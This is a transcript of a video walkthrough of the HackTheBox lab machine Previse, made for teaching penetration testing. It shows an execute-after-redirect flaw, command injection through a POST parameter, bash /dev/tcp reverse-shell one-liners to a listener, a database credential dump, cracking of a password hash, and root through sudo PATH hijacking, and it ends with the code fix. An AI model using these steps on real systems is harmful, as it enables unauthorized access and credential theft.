What's going on YouTube? This is IPSec. I'm doing Previse from HackTheBox, which is a nice easy box, and the intended route is something that's been unintended on many machines at HackTheBox, and I just didn't know the name of the exploit class, which is an execute after read vulnerability. Now that name sounds really bad because it's got execute in the name, but it's not like an arbitrary code execution where you can make the web server execute anything you want. It's when the web server sends you a redirect because you don't have access to that page, but keeps on executing the script, leaking out what the page would have looked like. So it's more of an information disclosure vulnerability. However, this application is also vulnerable to IDOR all over the place, which is an insecure direct object reference, which essentially means as an unauthenticated user, we can do things that an admin could as long as we know the magic data to send it. And the information leakage from the execute after read vulnerability is just that. There's a bunch of other fun stuff in this box, so let's just hop right on in. As always, we start out with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Previse, and then the IP address, which is 10.10.11.104. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The very first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP open on port 80. Its banner tells us it's Apache and also Ubuntu. And then also the scripts are telling us it's returning the cookie PHP session ID. So most likely hosting PHP scripts, especially when you combine that with this line. That looks like it is a redirect, but it's redirecting us to login.php. So let's go take a look at this web server. Going to 10.10.11.104, we just get this Previse file storage. So I always like doing a GoBuster. Let's start that off. So GoBuster dir, then -u for URL, http 10.10.11.104-w4word opt sec list discovery web content wrapped small words.txt, and then the extension PHP because this is hosting PHP scripts. You may want to do like text, HTML, other things, but I like keeping it as small as possible. And then -o for out file and GoBuster.out. And right off the bat, we get a lot of hits. And the really weird thing that we're seeing is we have these redirects, some 302s, 301 redirects. Let's see. It looks like everything that's a file is a 302 redirect, and then a folder is a 301. But what's more odd is there is a size to these redirects. And in most applications, when you do a redirect, you don't actually include anything in the content. We can show this by probably just going to / and seeing this redirect. So let's open up BurpSuite. Let's see, intercept is on. And let's see, it's getting login.php, so let's just get / and we can put it in a repeater tab actually. So we have this 302 redirect, and it's telling a browser go to location.php. But the code doesn't have a die function at the end after it does the redirect, so it keeps outputting all the data. And this is called a IDOR vulnerability. It is execute after redirect, and it's more of just like an informational thing. I think we can actually do this whole box without this vulnerability, which we'll look at the end of the video, but this definitely does help us because we can see a bunch of PHP files here. So I'm just going to copy the file, and I'm going to call this index.html. And let's go over here, and we can cat index.html. Did it just copy what I had highlighted? That's not what I want. I want to copy the whole thing. Watch, is only going to copy that line that I clicked on. Nope, there we go. And I can grep for PHP, and we can see everything here. Let's see if I can get fancy real quick. Let's do grep-op like that, and then maybe this. Let's see what happens here. There we go. This is a positional thing, only showing us what we wanted. There's probably better flags to do exactly this, but how I remember it is this grep is overpowered. So that's how I have it like that. So we can see all the files here, index, accounts, files, status, file log, and logout. And if we went over to GoBuster, we'd probably see those as well. And we can probably examine them through the IDOR vulnerability because the size was different. So like if we look at, let's see, account is probably here, right? Do we have account? We do. Accounts.php, we can see the size. So if we wanted to get it, we could easily see it. But the one thing I like doing is always having recon go in the background. So I'm going to see if we can just do SQL map against this real quick. So let's clear a cache on BurpSuite, admin, attempt to log in, copy it to file, and we'll do login.request. And then we can do SQL map -r, login-request, --batch, so it doesn't ask us any questions. It just chooses default for everything. And now we can keep on going. So at the end of the video, I'm going to go into doing this accounts.php without the error vulnerability that execute after redirect. But for doing it quickly, let's take advantage of that. So if we turn intercept on, actually, let's turn intercept off. I can show you the behavior. We go to accounts.php. It sends us a redirect to login.php. If we want to look at that in BurpSuite, we can easily do that. So we're doing a get. Let us intercept the response to this request. It says 302 found. We have all this data here, but our browser sees 302 and login.php and then immediately goes to it. So what we can do is go back here and then intercept the response to this request, forward it, and then just change this to 200 OK. And now when we forward it to a browser, we get to this page. So we can try logging in, or not logging in, but creating an account. It says username and passwords must be between 5 and 32 characters. So let's do ipsec and please subscribe. Okay. I wanted to intercept this request. Create user. Send to repeater just so we have it if we need it. And puts us back on login. If I try logging in, please subscribe. We do get logged in with this Previse file hosting. So this is the index.php that we had originally seen. And we can go over into files, and it looks like we could download this. So we have site backup.zip. So I'm going to download that. We can move it into a directory. And then before I unzip anything, I always like creating a directory first, because sometimes the zips themselves don't have a directory and that just clobbers your working directory. So if I unzip site backup, we can see it just dropped a bunch of files in my current working directory, which isn't ideal. If I did that into this directory, it may become a pain to clean it up. So that's why I always just create a directory before doing the zip. So we have a bunch of PHP things. What I'm going to do is grep everything for $_. And the reason why I'm doing that is I just want to see everywhere user input can interact with the site, because that's the vulnerability I'm looking for. Now, I don't care about session or server, so I'm going to do a grep-v to remove those. So let's do _server, and then this \pipe is a or in grep. So now we can also do _session, and we are left with very few things. So the less-s, all I did with that, if I didn't do it, we can see this line is line wrapped, but less-s disables line wrapping, and I can do left and right to see more. So we may want to look at accounts.php and look at what it's doing with this, but right off the bat, this is not vulnerable. If I saw like MySQL syntax and then the post variable, then I know, oh, that's SQL injectable most likely, but I don't see anything that looks dangerous so far. We do have download.php and files.php, and it says is upload file. So I'm thinking this could be a potential like LFI vulnerability. So let's see exactly how it goes, or maybe we can just upload files to the server. So if I edit files.php. Let's see what we can do here. We got a success, upload files below. So how are we uploading files? Let's see, request method, select protected. I don't know exactly what this is. Delete from, so this is deleting a file. But I don't know what protected means. It is the column of a table, but I don't understand yet how this application is using that. Select ID, name, user, upload time. Let's see. So right here, it's looping through everything from the SQL, but I don't exactly know off the top of my bat. So let's just keep going down the list. Eventually we see this very last one. It's doing a exec, and then we have post delim, and it's logs.php. So let's take a look here for logs.php. We have log data, but that is about it. If I just type /logs.php, it's giving us something. So maybe we can grep logs.php, and we see file logs has an action set to logs.php, and the method is post. So let's go to log data, which is file logs.php, and it says request log data. Let us intercept this request, turn it on, submit, and we go here. We got delimiter, comma, and when we send this, we have a bunch of text. But looking at the code, we see output is equal to exec, Python op scripts log process, and then the post parameter delim. And we're just in a pretty much shell command. So if we just put a semicolon here, so comma, semicolon, sleep 1, we see this page responded in 500 milliseconds with a sleep 1. It's 1500 milliseconds, which is 1.5 seconds. We get rid of that sleep, and it's down in the half a second. Sleep 2, and it is 2.5 milliseconds. So we definitely have command execution here. So what I'm going to do is --c, --i, and then dev tcp 10.10.14.8, 9001, 0 and 1. And then we can just do nc lvnp 9001 and send this. And we don't have a reverse shell, but we know this is vulnerable. So chances are we just made a mistake. I'm going to URL encode everything because that's generally my first step of troubleshooting. And the page is not responding to us, which is a good sign because it sent us the shell. So what I'm going to do here, let's do python-c, import pty, pty.spawn, bin bash, and then Control-Z to background it, and we can do stty raw minus echo, then semicolon fg, and then all we do is enter twice to get, or hit enter twice to get back into a shell, and we're in a shell that we have tab autocomplete and everything there. The last thing I like doing is export term is equal to xterm, so that lets me clear the screen. But once I have a shell on the box, the very first thing I always go to in a web server is its configuration files, because that's going to be where the MySQL password is. And when you have the MySQL password, you can enter MySQL and dump all the credentials out of the database. So let's do that. Let's do MySQL-u root, specify -p for password, and then copy the whole thing. And then we can do show databases and see all the databases here. My first step is always going into the web application. Previse is the non-default one. We can do show tables, and there's a files and account. I'm guessing the thing I want is accounts, but I just want to see what file is and what is protected. Select protected from star. Select protected from files. There we go. So it's only one. Let's see. Name protected. If I had to guess, this protected flag is preventing file deletion, would be my assumption. But there was one other interesting thing I saw in this database is they have actual data and its type is a blob. So all the files are actually being stored in the database. So if I do select data from files, we see this is the zip. Right here is the magic bytes for zip. We see accounts.php, which is that file name. So even if we uploaded files to the server, we can't really get code execution because it's just storing them in the database. So let's just go to the accounts. So select star from accounts, and we have two accounts, malware and then IPsec. We know what my password is. It's got some weird characters here that's going to make extracting this a pain. So let's do select star from accounts where ID is equal to 1, because I only want to get malwares. And what I'm going to do is we can select to base 64 password from accounts. And now we converted this field into base 64, which allows us to copy these characters, which are bad characters. So we can show this by, let's do v, or we can just do echo -n base 64-d to output. If I cat output, we see that. If I just had copy and pasted this, I'm going to guess these files are not the same. I'm not 100% positive, but you'd really have no guarantee. So let's do xxd output and xxd test. And let's see. It looks like it actually did copy and paste correctly. This is $1. And then here's where these like bytes are weird. F0, 9F, A7, A2, 6C. So we can see it copied just fine. So we didn't have to go in the base 64 thing, but always better safe than sorry. So the next thing we want to do is try to crack this password. So if I cat output, this is just MD5 crypt. Let's see, can we just do hashcat? What version of hashcat do I have? 6? Let's see if I can just do hashcat on this VM. If not, then I have to go pause the video and power up my Kraken. So hashcat-m, I think 500 is MD5 crypt. Let's do dictionary would be, let's see, user share word list, rocku.txt, and then the hash is output. Let's see. Actually, it goes hash file and then dictionary. Let's see. Unknown target CPU generic. Yeah. Hashcat's not working on my box. And I think the Kraken is offline. Yeah, it is. But through the magic of video editing, I was able to pause the video, power on the box, and now we can run hashcat. So let's cat the password. So let's do cat output. We already know we should be able to copy and paste these bad characters, so I'm not going to base 64 it. So we go into hashcat, and then I'm going to v hashes, Previse, paste it in, and then we can do hashcat. And I actually don't think we need to do -m500 because it will just auto-detect, which is a cool feature in the latest version of hashcat. So hashes, Previse, and then the other thing I want to do is opt word list rocku.txt. So let's see if it automatically detects this is MD5 crypt. Auto detecting. Let's see. Did it? Yep. It detected as 500 MD5 crypt. And it is now attempting to crack this password. If it does not get it, which it did just get it, I was going to say if it doesn't get it, I try it again with copy and base 64, but it is I love Cody, and then 112235. So if we look at the users on this box in passwd, we can see malware is a user. So I'm going to try su-m4lwhere, and we can see indeed that is this guy's password. Now, whenever I have the ability to go into SSH instead of reverse shell, I always take that. So let's do SSH 10.10.11.104, paste in the password, and we are good. So we can close that and get user.txt. The first thing I always do on a box is check my sudos, and we can see something is weird. So in close again, if you can tell what is different, I'm going to run sudo-l on my box, and normally I see this line, this whole matching defaults entry thing. And secure path, this is preventing me from changing the path with sudo. Since those aren't there, since like environment reset's not there, my whole environment is being passed into sudo, which means we could potentially do some bad things. So let's take a look at op scripts access backup.sh, and let's see, bin bash, and we see he's trying to do gzip, and this can be ran with root. So if I just do sudo in the script, it's going to back everything up in var backups. If we look at that, we can see January 5th, this is my backups. We could grab these files and see if there's a different password and maybe get it that way. But before you do that, let's see. Do we have read permissions? We do. I saw like pastwd and chat. I was like, oh, we could potentially crack roots. But no, we can't because only root can read that file. But everyone can read all these, so we could always grab like this. If I do, wait, it's only access and file access. So these aren't actually the source code of the application, so there's probably no passwords in there. If we cat this, it's just going and grabbing log files. So it's even less beneficial than I wanted to. However, because the sudo isn't doing environment reset or secure path, we can take advantage of this not being a absolute path. So whenever you do a thing like bash, what it's going to do is look in your path and then pick the file that's in the very first result. So like if we had a bash in user local sbin, then that's the one it would execute. If we do which bash, we can see it's in bin bash, and bin would be down here. So what we're going to do is edit our path because this is just an environment variable or a variable that we can edit. I'm going to put our working directory up front. So let's do vi gzip bin bash, or bin sh I guess we could do. Echo, here is your shell. This is just so we know it executed, because when I do bash at the end of this, if I bash gzip, it's just going to give me another prompt. So that's why I put that echo there so I know something did execute. The last thing we have to do is chmod to make it executable, because non-executable files won't execute. So if I just type gzip now, it says it's just the normal thing. We can do which gzip and echo path. It's in bin. So let's export path is equal to period, which is current working directory, and then paste everything after this. Or we can just do path like this. We don't have to copy and paste. We can do it with the variable as long as we type export correctly. So now when I do which gzip, it's going to do /gzip. Before, it did bin gzip. So if I execute just gzip, it's not executing that old binary, it's executing mine. So now we can do sudo-l and execute the script, and we get root. cd/root. Oh, ID? ID? Ooh, we don't have output. That's weird. Let's see, vgzip. Instead of that, let's do, we can tell it to execute in bash, and then just do bash-i dev tcp 10.10.14.8 Now that was 1, 0 at, and 1. Then NC LVNP 9001. Execute this. And there we go. We have the output. What's happening there is I think a reverse shell for some reason wasn't capturing standard in and standard out. And that's just had that weird effect. But we can see it now. We have root.txt. I did want to go into the IDOR vulnerability. So remember at the very beginning of this box, we hit accounts.php or account.php, right? Accounts.php is BurpSuite intercepting. Log out. Did I hang the web server? Uh-oh, that's weird. Curl localhost. It's working. I think this is my browser that's screwed up. 10.10.11.104. Let's close Firefox. Open Firefox. There we go. I have no idea what happened. But if we did accounts.php, it's just redirecting us. So one thing we could try doing is going into BurpSuite, and we can change the request. Let's get rid of the post. See what it looks like here. Come on. I wonder if my VPN's not having an issue, right? Because my SSH is working. Let's see. Get slash. Does it only want one line break? An extra one? This is becoming problematic. BurpSuite. Proxy intercept. Okay. Okay. Maybe it's a cookie. Maybe that cookie, like something happened in that request. And yep, it is the cookie. So something happened to that session that I had there and caused all sorts of weirdness, but we're good. So if we didn't have that execute after redirect, we wouldn't be able to see all this. We'd only be able to see what's in the header. We want accounts.php. So what we could do is send a post request to this. And let's see, does this say anything? Maybe we need that execute after relay, because it would be still a redirect. But what I was going to say is instead of putting in the browser, we could either just read this whole thing or fuzz it. So if I do username is equal to please subscribe and then send the request, we look at the output. We can see the username needs to be provided. USER name. This is weird. Hold on. Post logs, no. Accounts.php. Let's get rid of this PHP session. Okay. Do I have a typo or something? Let's see. This. Post/accounts. I was trying to decide what is different between these two. Because this is telling me the username needs to be provided. And this one is telling me password needs to be provided. I wonder if it is this cookie. Sudo 2. No. What is different between these two requests? Oh, this has content type. So this header is a super important one in doing web fuzzing and things. Always be sure when doing post requests to have that. There we go. So if we put this so we can always quickly find here, it says the password needs to be provided, so we can do and password is equal to please subscribe. And this would be kind of how you fuzz an API. Now it's saying the password confirmation needs to be provided. So what we could do here is probably fuzz this. So let's do WFUZZ-U for URL, HTTP 10.10.11. Was it 104-U -X, and then username is equal to please subscribe, and password is equal to, we'll do IPsec, and this will be fuzz because we don't know this parameter, is equal to IPsec because it says password confirmation needs to be provided. It's either like password 2, password confirm, confirmation. We don't know that last variable. So that's what we're doing here. And -W for word list, opt, sec list, fuzzing. And then, is there parameters? Let's see. cd opt sec list fuzzing, ls grep par. Let's do find.grep-i param. Okay, it's discovery web content, not a fuzz. Discovery web content parameter names. So if we try this, we have an error. So let's see. WFUZZ. I wonder if it's like -D or something for data. I know I thought it was X. And that looks better. So we can do -H. H, I think, to hide 2801. And we'll see if this hits it. Actually, not positive if it's in this. I'm guessing it would be. Let's see. While this goes, we can cheat a little bit. Cat this file, grep. I think it's confirm. It is indeed here. But what we may be missing is that header again. So I'm going to do -H and then specify this content type. Like that. And it is through 2 redirects, which is kind of what we expected. But we do expect once a parameter is hit for it to differ in the number of characters it outputs and to tell us. And it is not doing that. Let's see. Where is confirm in this? VI confirm line 82. So it should tell us almost immediately. So we have an error. So I wonder, let's see, -H proxy, so IP port type. So we can do -P 127.0.0.1 8080 HTTP. So I want to send the request to BurpSuite to see exactly what this looks like. It wants it in caps. Okay. And what we forgot to do is /accounts.php. So HTTP /accounts.php. And we probably want to hide 4131. And we can see confirm gets 4110 characters. And that is going to be the one we want. So and confirm is equal to please subscribe. We go back here. We can see username must be between 5 and 32 characters. So let's do the username ipsec2. And we have success, user was added. So that is how you can kind of fuzz this whole output. The other thing I want to go into while we have you, we can look at it real quick. The actual vulnerability, cd var www html. This is how we would fix the execute after relay. So if I look at index.php, we have this is set header location. And what you do, we need to get root, nclvmp 9001. Okay. So var www html, we have to get tty. Tty minus was it raw echo? It was not that. 1 second. Oh man, I'm having like brain farts all over the place. Let me slow down. Do this. Okay. Python 3-c import pty, pty.spawn, bin bash, stty raw minus echo, fg enter enter. There we go. Export term is equal to xterm. Okay. There we go. So let's go back to index. And all we do, so this is if we're not logged in, just add a die. So now when we go to BurpSuite, we get slash. We probably have to get rid of this cookie. It's just redirecting us and we no longer have the data. So that's all they'd have to do everywhere is just put die statements there, and then that whole execute after redirect would be fixed. So hope you guys enjoyed the video. Take care, and I will see you all next time.